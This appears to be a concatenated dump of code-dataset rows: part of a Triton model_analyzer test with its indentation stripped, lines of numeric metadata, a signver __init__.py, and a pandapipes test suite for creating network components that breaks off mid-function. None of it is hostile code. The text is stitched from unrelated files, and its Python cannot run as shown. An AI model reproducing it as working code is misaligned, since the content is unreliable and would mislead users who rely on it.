vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 6)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 54)
instance_groups = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
self.assertTrue(len(expected_instance_groups), instance_groups)
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 54)
instance_groups = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
self.assertTrue(len(expected_instance_groups), instance_groups)
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
dynamic_batching:
preferred_batch_size: [ 4, 8 ]
max_queue_delay_microseconds: 100
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 54)
instance_groups = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
instance_groups.append(instance_group)
expected_instance_groups = 9 * [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
self.assertEqual(len(expected_instance_groups),
len(instance_groups))
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
dynamic_batching:
preferred_batch_size: [[ 4, 8 ], [ 5, 6 ]]
max_queue_delay_microseconds: [100, 200]
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 216)
instance_groups = []
dynamic_batchings = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
dynamic_batching = run_config.model_config().get_config(
)['dynamic_batching']
dynamic_batchings.append(dynamic_batching)
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
expected_dynamic_batchings = [{
'preferred_batch_size': [4, 8],
'max_queue_delay_microseconds':
'100'
}, {
'preferred_batch_size': [4, 8],
'max_queue_delay_microseconds':
'200'
}, {
'preferred_batch_size': [5, 6],
'max_queue_delay_microseconds':
'100'
}, {
'preferred_batch_size': [5, 6],
'max_queue_delay_microseconds':
'200'
}]
self.assertEqual(
len(instance_groups), 9 * len(expected_instance_groups) *
len(expected_dynamic_batchings))
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
for dynamic_batching in dynamic_batchings:
self.assertIn(dynamic_batching, expected_dynamic_batchings)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
dynamic_batching:
-
preferred_batch_size: [ 4, 8 ]
max_queue_delay_microseconds: 100
-
preferred_batch_size: [ 5, 6 ]
max_queue_delay_microseconds: 200
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 12)
instance_groups = []
dynamic_batchings = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
dynamic_batching = run_config.model_config().get_config(
)['dynamic_batching']
dynamic_batchings.append(dynamic_batching)
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
expected_dynamic_batchings = [{
'preferred_batch_size': [4, 8],
'max_queue_delay_microseconds':
'100'
}, {
'preferred_batch_size': [5, 6],
'max_queue_delay_microseconds':
'200'
}]
self.assertEqual(
len(instance_groups),
len(expected_instance_groups) *
len(expected_dynamic_batchings))
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
for dynamic_batching in dynamic_batchings:
self.assertIn(dynamic_batching, expected_dynamic_batchings)
mock_model_config.stop()
mock_client.stop()
| 39.788779 | 79 | 0.428459 | 1,879 | 24,112 | 5.172964 | 0.093667 | 0.081481 | 0.052469 | 0.02963 | 0.859362 | 0.851029 | 0.839403 | 0.836317 | 0.836317 | 0.831481 | 0 | 0.016061 | 0.496475 | 24,112 | 605 | 80 | 39.854545 | 0.784532 | 0.029861 | 0 | 0.858696 | 0 | 0 | 0.188278 | 0.048471 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.003623 | false | 0 | 0.019928 | 0 | 0.027174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b97db24d7a582f7db94277f1178dad6585f3417f | 83 | py | Python | signver/utils/__init__.py | victordibia/signver | e547177b5dab542c6d242566675ddb9468dadc08 | [
"MIT"
] | 4 | 2021-09-06T13:02:05.000Z | 2022-03-20T15:22:45.000Z | signver/utils/__init__.py | victordibia/signver | e547177b5dab542c6d242566675ddb9468dadc08 | [
"MIT"
] | null | null | null | signver/utils/__init__.py | victordibia/signver | e547177b5dab542c6d242566675ddb9468dadc08 | [
"MIT"
] | 1 | 2022-03-04T16:20:52.000Z | 2022-03-04T16:20:52.000Z | from signver.utils import data_utils
from signver.utils import visualization_utils
| 27.666667 | 45 | 0.879518 | 12 | 83 | 5.916667 | 0.5 | 0.309859 | 0.450704 | 0.619718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096386 | 83 | 2 | 46 | 41.5 | 0.946667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b9af2912032a2869ba1222c94a4c0773ad5fe032 | 36,326 | py | Python | pandapipes/test/api/test_create.py | dlohmeier/pandapipes | 899bb44fdf5a4ff6aa3cac0a7bf88bc30611c73f | [
"BSD-3-Clause"
] | 48 | 2020-02-14T13:16:31.000Z | 2022-03-30T07:15:55.000Z | pandapipes/test/api/test_create.py | dlohmeier/pandapipes | 899bb44fdf5a4ff6aa3cac0a7bf88bc30611c73f | [
"BSD-3-Clause"
] | 279 | 2020-02-20T13:06:56.000Z | 2022-03-14T12:29:59.000Z | pandapipes/test/api/test_create.py | jkisse/pandapipes | a1ca2ca3e3913bc8a379f43085935f0ee1d10fd8 | [
"BSD-3-Clause"
] | 30 | 2020-02-14T15:38:24.000Z | 2022-02-21T13:37:12.000Z | # Copyright (c) 2020-2021 by Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel, and University of Kassel. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import copy
import pytest
import pandapipes
import numpy as np
@pytest.fixture
def create_empty_net():
    """Return a fresh, empty pandapipes network (new instance per test)."""
    return pandapipes.create_empty_network()
def test_create_network():
    """An invalid ``fluid`` argument must leave the net without a usable fluid,
    so that a subsequent fluid lookup fails with AttributeError."""
    net = pandapipes.create_empty_network(fluid=3)
    with pytest.raises(AttributeError):
        pandapipes.get_fluid(net)
def test_create_junction(create_empty_net):
    """A junction stores its pressure/temperature parameters under the given
    index; reused indices and malformed geodata raise UserWarning."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8)

    junctions = net.junction
    assert len(junctions) == 1
    assert np.all(junctions.index == [8])
    assert junctions.at[8, "pn_bar"] == 1
    assert junctions.at[8, "tfluid_k"] == 293

    # index 8 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_junction(net, 1, 293, index=8)
    # geodata must be a 2-tuple (x, y)
    with pytest.raises(UserWarning):
        pandapipes.create_junction(net, 1, 293, geodata=(1, 2, 3))
def test_create_sink(create_empty_net):
    """A sink attaches to an existing junction; nonexistent junctions and
    reused indices raise UserWarning."""
    net = copy.deepcopy(create_empty_net)
    for junction_index in (8, 9):
        pandapipes.create_junction(net, 1, 293, index=junction_index)
    pandapipes.create_sink(net, 9, mdot_kg_per_s=0.1, index=2)

    assert len(net.junction) == 2
    sinks = net.sink
    assert len(sinks) == 1
    assert np.all(sinks.index == [2])
    assert sinks.at[2, "junction"] == 9
    assert sinks.at[2, "mdot_kg_per_s"] == 0.1

    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_sink(net, junction=10, mdot_kg_per_s=0.1)
    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_sink(net, junction=9, mdot_kg_per_s=0.1, index=2)
def test_create_source(create_empty_net):
    """A source attaches to an existing junction; nonexistent junctions and
    reused indices raise UserWarning."""
    net = copy.deepcopy(create_empty_net)
    for junction_index in (8, 9):
        pandapipes.create_junction(net, 1, 293, index=junction_index)
    pandapipes.create_source(net, 9, mdot_kg_per_s=0.1, index=2)

    assert len(net.junction) == 2
    sources = net.source
    assert len(sources) == 1
    assert np.all(sources.index == [2])
    assert sources.at[2, "junction"] == 9
    assert sources.at[2, "mdot_kg_per_s"] == 0.1

    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_source(net, junction=10, mdot_kg_per_s=0.1)
    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_source(net, junction=9, mdot_kg_per_s=0.1, index=2)
def test_create_ext_grid(create_empty_net):
    """An external grid stores pressure and temperature at its junction;
    nonexistent junctions and reused indices raise UserWarning."""
    net = copy.deepcopy(create_empty_net)
    for junction_index in (8, 9):
        pandapipes.create_junction(net, 1, 293, index=junction_index)
    pandapipes.create_ext_grid(net, 9, p_bar=1, t_k=295, index=2)

    assert len(net.junction) == 2
    ext_grids = net.ext_grid
    assert len(ext_grids) == 1
    assert np.all(ext_grids.index == [2])
    assert ext_grids.at[2, "junction"] == 9
    assert ext_grids.at[2, "p_bar"] == 1
    assert ext_grids.at[2, "t_k"] == 295

    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_ext_grid(net, junction=10, p_bar=1, t_k=295)
    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_ext_grid(net, junction=9, p_bar=1, t_k=295, index=2)
def test_create_heat_exchanger(create_empty_net):
    """A heat exchanger connects two junctions and stores its parameters;
    nonexistent junctions and reused indices raise UserWarning."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
    pandapipes.create_heat_exchanger(net, 8, 9, 0.3, qext_w=200, index=2)

    assert len(net.junction) == 2
    hx = net.heat_exchanger
    assert len(hx) == 1
    assert np.all(hx.index == [2])
    assert hx.at[2, "from_junction"] == 8
    assert hx.at[2, "to_junction"] == 9
    assert hx.at[2, "diameter_m"] == 0.3
    assert hx.at[2, "qext_w"] == 200
    # loss coefficient defaults to zero
    assert hx.at[2, "loss_coefficient"] == 0

    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_heat_exchanger(net, 8, 10, 0.3, qext_w=200)
    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_heat_exchanger(net, 8, 9, 0.3, qext_w=200, index=2)
def test_create_pipe(create_empty_net):
    """A pipe created from a standard type inherits its diameter; invalid
    junctions, reused indices and unknown std_types raise UserWarning, as does
    any std_type lookup on a net created without standard types."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
    pandapipes.create_pipe(net, 8, 9, "80_GGG", 0.3, index=2, geodata=[(0, 1), (1, 1), (2, 2)])

    assert len(net.junction) == 2
    pipes = net.pipe
    assert len(pipes) == 1
    assert np.all(pipes.index == [2])
    assert pipes.at[2, "from_junction"] == 8
    assert pipes.at[2, "to_junction"] == 9
    assert pipes.at[2, "length_km"] == 0.3
    # diameter is taken from the "80_GGG" standard type
    assert pipes.at[2, "diameter_m"] == 0.086
    assert pipes.at[2, "loss_coefficient"] == 0
    assert pipes.at[2, "std_type"] == "80_GGG"

    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_pipe(net, 8, 9, "80_GGG", 0.3, index=2)
    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_pipe(net, 8, 10, "80_GGG", 0.3)
    # unknown standard type
    with pytest.raises(UserWarning):
        pandapipes.create_pipe(net, 8, 9, "blah", 0.3)

    # without standard types loaded, every std_type lookup must fail
    net2 = pandapipes.create_empty_network(fluid="hgas", add_stdtypes=False)
    pandapipes.create_junction(net2, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net2, 1, 293, index=9, geodata=(2, 2))
    with pytest.raises(UserWarning):
        pandapipes.create_pipe(net2, 8, 9, "80_GGG", 0.3)
def test_create_pipe_from_parameters(create_empty_net):
    """A pipe created from explicit parameters has no std_type; reused
    indices, nonexistent junctions and a std_type keyword raise UserWarning."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
    pandapipes.create_pipe_from_parameters(net, 8, 9, 0.3, 0.4, index=2,
                                           geodata=[(0, 1), (1, 1), (2, 2)])

    assert len(net.junction) == 2
    pipes = net.pipe
    assert len(pipes) == 1
    assert np.all(pipes.index == [2])
    assert pipes.at[2, "from_junction"] == 8
    assert pipes.at[2, "to_junction"] == 9
    assert pipes.at[2, "length_km"] == 0.3
    assert pipes.at[2, "diameter_m"] == 0.4
    assert pipes.at[2, "loss_coefficient"] == 0
    # no standard type involved in parameter-based creation
    assert pipes.at[2, "std_type"] is None

    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_pipe_from_parameters(net, 8, 9, 0.3, 0.4, index=2)
    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_pipe_from_parameters(net, 8, 10, 0.3, 0.4)
    # std_type is not a valid keyword for parameter-based creation
    with pytest.raises(UserWarning):
        pandapipes.create_pipe_from_parameters(net, 8, 9, 0.3, 0.4, std_type="blah")
def test_create_valve(create_empty_net):
    """A valve connects two junctions; reused indices and nonexistent
    junctions raise UserWarning, and line geodata raises ValueError."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
    pandapipes.create_valve(net, 8, 9, 0.4, True, index=2)

    assert len(net.junction) == 2
    valves = net.valve
    assert len(valves) == 1
    assert np.all(valves.index == [2])
    assert valves.at[2, "from_junction"] == 8
    assert valves.at[2, "to_junction"] == 9
    assert valves.at[2, "diameter_m"] == 0.4
    assert valves.at[2, "loss_coefficient"] == 0

    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_valve(net, 8, 9, 0.4, True, index=2)
    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_valve(net, 8, 10, 0.4, True)
    # valves are dimensionless components and accept no line geodata
    with pytest.raises(ValueError):
        pandapipes.create_valve(net, 8, 9, 0.4, True, geodata=[(0, 1), (1, 1), (2, 2)])
def test_create_pump(create_empty_net):
    """A pump created from a standard type stores that type; invalid inputs
    raise UserWarning (ValueError for geodata), and std_type lookup fails on a
    net created without standard types."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
    pandapipes.create_pump(net, 8, 9, "P1", index=2)

    assert len(net.junction) == 2
    pumps = net.pump
    assert len(pumps) == 1
    assert np.all(pumps.index == [2])
    assert pumps.at[2, "from_junction"] == 8
    assert pumps.at[2, "to_junction"] == 9
    assert pumps.at[2, "std_type"] == "P1"

    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_pump(net, 8, 9, "P1", index=2)
    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_pump(net, 8, 10, "P1")
    # unknown standard type
    with pytest.raises(UserWarning):
        pandapipes.create_pump(net, 8, 9, "blah")
    # pumps are dimensionless components and accept no line geodata
    with pytest.raises(ValueError):
        pandapipes.create_pump(net, 8, 9, "P1", geodata=[(0, 1), (1, 1), (2, 2)])

    # without standard types loaded, the std_type lookup must fail
    net2 = pandapipes.create_empty_network(fluid="hgas", add_stdtypes=False)
    pandapipes.create_junction(net2, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net2, 1, 293, index=9, geodata=(2, 2))
    with pytest.raises(UserWarning):
        pandapipes.create_pump(net2, 8, 9, "P1")
def test_create_pump_from_parameters(create_empty_net):
    """Check pump creation from a regression polynomial and the error cases."""
    net = copy.deepcopy(create_empty_net)
    pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
    pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
    # the pump characteristic shared by all calls below
    pump_kwargs = dict(pressure_list=[0, 1, 2, 3], flowrate_list=[0, 1, 2, 3],
                       reg_polynomial_degree=1)
    pandapipes.create_pump_from_parameters(net, 8, 9, "pump1", index=2, **pump_kwargs)

    assert len(net.junction) == 2
    assert len(net.pump) == 1
    assert np.all(net.pump.index == [2])
    assert net.pump.at[2, "from_junction"] == 8
    assert net.pump.at[2, "to_junction"] == 9
    assert net.pump.at[2, "std_type"] == "pump1"
    # the custom characteristic must have been registered as a std type
    assert "pump1" in net.std_type["pump"]

    # index 2 is already taken
    with pytest.raises(UserWarning):
        pandapipes.create_pump_from_parameters(net, 8, 9, "pump1", index=2, **pump_kwargs)
    # junction 10 does not exist
    with pytest.raises(UserWarning):
        pandapipes.create_pump_from_parameters(net, 8, 10, "pump1", index=2, **pump_kwargs)
    # pumps do not accept geodata
    with pytest.raises(ValueError):
        pandapipes.create_pump_from_parameters(net, 8, 9, "pump1",
                                               geodata=[(0, 1), (1, 1), (2, 2)],
                                               **pump_kwargs)
def test_create_junctions(create_empty_net):
    """Check vectorized junction creation with the different geodata variants."""
    net = copy.deepcopy(create_empty_net)
    # plain creation without geodata
    pandapipes.create_junctions(net, 3, 1, 293)
    # one coordinate broadcast to all created junctions
    j2 = pandapipes.create_junctions(net, 3, 1, 293, geodata=(10, 20))
    # one coordinate per junction, passed as an array
    geodata = np.array([[10, 20], [20, 30], [30, 40]])
    j3 = pandapipes.create_junctions(net, 3, 1, 293, geodata=geodata)

    assert len(net.junction) == 9
    assert len(net.junction_geodata) == 6
    for idx in j2:
        assert net.junction_geodata.at[idx, 'x'] == 10
        assert net.junction_geodata.at[idx, 'y'] == 20
    assert (net.junction_geodata.loc[j3, ['x', 'y']].values == geodata).all()
    assert (net.junction.pn_bar.values == 1).all()

    # a geodata array whose length does not match the junction count must fail
    with pytest.raises(ValueError):
        pandapipes.create_junctions(net, 2, 1, 293, geodata=geodata)
def test_create_pipes_from_parameters(create_empty_net):
    """Check vectorized pipe creation from parameters (scalar and array input)."""
    # standard call with a mix of scalar and list arguments
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pandapipes.create_pipes_from_parameters(net, [j1, j1], [j2, j2], 2, 0.2, sections=[1, 4])
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 0
    assert sum(net.pipe.sections) == 5
    assert len(set(net.pipe.length_km)) == 1

    # individual geodata per pipe
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    p = pandapipes.create_pipes_from_parameters(
        net, [j1, j1], [j2, j2], [1.5, 3], 0.5,
        geodata=[[(1, 1), (2, 2), (3, 3)], [(1, 1), (1, 2)]])
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 2
    assert net.pipe_geodata.at[p[0], "coords"] == [(1, 1), (2, 2), (3, 3)]
    assert net.pipe_geodata.at[p[1], "coords"] == [(1, 1), (1, 2)]

    # all parameters given as single values -> broadcast to both pipes
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    p = pandapipes.create_pipes_from_parameters(
        net, [j1, j1], [j2, j2], length_km=5, diameter_m=0.8, in_service=False,
        geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
        alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01)
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 2
    scalar_expectations = {
        "length_km": 5, "in_service": False, "name": "test", "k_mm": 0.01,
        "loss_coefficient": 0.3, "diameter_m": 0.8, "sections": 2,
        "alpha_w_per_m2k": 0.1, "text_k": 273, "qext_w": 0.01}
    for col, expected in scalar_expectations.items():
        # "in_service" is actually a numpy.bool_, but == comparison still holds
        assert net.pipe.at[p[0], col] == expected
        assert net.pipe.at[p[1], col] == expected
    assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
    assert net.pipe_geodata.at[p[1], "coords"] == [(10, 10), (20, 20)]

    # all parameters given as arrays -> applied element-wise
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    p = pandapipes.create_pipes_from_parameters(
        net, [j1, j1], [j2, j2], length_km=[1, 5], diameter_m=[0.8, 0.7],
        in_service=[True, False],
        geodata=[[(10, 10), (20, 20)], [(100, 10), (200, 20)]], name=["p1", "p2"],
        k_mm=[0.01, 0.02], loss_coefficient=[0.3, 0.5], sections=[1, 2],
        alpha_w_per_m2k=[0.1, 0.2], text_k=[273, 274], qext_w=[0.01, 0.02])
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 2
    array_expectations = {
        "length_km": [1, 5], "in_service": [True, False], "name": ["p1", "p2"],
        "diameter_m": [0.8, 0.7], "k_mm": [0.01, 0.02], "loss_coefficient": [0.3, 0.5],
        "alpha_w_per_m2k": [0.1, 0.2], "sections": [1, 2], "text_k": [273, 274],
        "qext_w": [0.01, 0.02]}
    for col, (first, second) in array_expectations.items():
        assert net.pipe.at[p[0], col] == first
        assert net.pipe.at[p[1], col] == second
    assert net.pipe_geodata.at[p[0], "coords"] == [(10, 10), (20, 20)]
    assert net.pipe_geodata.at[p[1], "coords"] == [(100, 10), (200, 20)]
def test_create_pipes_from_parameters_raise_except(create_empty_net):
    """Check the expected warnings for bad junctions and duplicate pipe indices."""
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    j3 = pandapipes.create_junction(net, 3, 273)
    # keyword arguments shared by every creation attempt below
    common = dict(length_km=5, diameter_m=0.8, in_service=False,
                  geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01,
                  loss_coefficient=0.3, sections=2, alpha_w_per_m2k=0.1,
                  text_k=273, qext_w=0.01)
    # junctions 4 and 5 do not exist
    with pytest.raises(UserWarning, match=r"trying to attach to non existing junctions"):
        pandapipes.create_pipes_from_parameters(net, [1, 3], [4, 5], **common)
    # first creation with explicit indices succeeds ...
    pandapipes.create_pipes_from_parameters(net, [j1, j1], [j2, j3], index=[0, 1], **common)
    # ... repeating the same indices must fail
    with pytest.raises(UserWarning, match=r"with indexes \[0 1\] already exist"):
        pandapipes.create_pipes_from_parameters(net, [j1, j1], [j2, j3], index=[0, 1],
                                                **common)
def test_create_pipes(create_empty_net):
    """Check vectorized pipe creation from a std type (scalar and array input)."""
    # standard call
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    pandapipes.create_pipes(net, [j1, j1], [j2, j2], "80_GGG", 2, sections=[1, 4])
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 0
    assert sum(net.pipe.sections) == 5
    assert np.all(net.pipe.std_type == ["80_GGG"] * 2)
    assert len(set(net.pipe.length_km)) == 1

    # individual geodata per pipe
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    p = pandapipes.create_pipes(net, [j1, j1], [j2, j2], "80_GGG", [1.5, 3],
                                geodata=[[(1, 1), (2, 2), (3, 3)], [(1, 1), (1, 2)]])
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 2
    assert net.pipe_geodata.at[p[0], "coords"] == [(1, 1), (2, 2), (3, 3)]
    assert net.pipe_geodata.at[p[1], "coords"] == [(1, 1), (1, 2)]

    # parameters as single values -> broadcast; the diameter comes from the std type
    net = copy.deepcopy(create_empty_net)
    j1 = pandapipes.create_junction(net, 3, 273)
    j2 = pandapipes.create_junction(net, 3, 273)
    p = pandapipes.create_pipes(
        net, [j1, j1], [j2, j2], std_type="80_GGG", length_km=5, in_service=False,
        geodata=[(10, 10), (20, 20)], name="test", k_mm=0.01, loss_coefficient=0.3, sections=2,
        alpha_w_per_m2k=0.1, text_k=273, qext_w=0.01)
    assert len(net.pipe) == 2
    assert len(net.pipe_geodata) == 2
    scalar_expectations = {
        "length_km": 5, "in_service": False, "name": "test", "std_type": "80_GGG",
        "k_mm": 0.01, "loss_coefficient": 0.3, "diameter_m": 0.086, "sections": 2,
        "alpha_w_per_m2k": 0.1, "text_k": 273, "qext_w": 0.01}
    for col, expected in scalar_expectations.items():
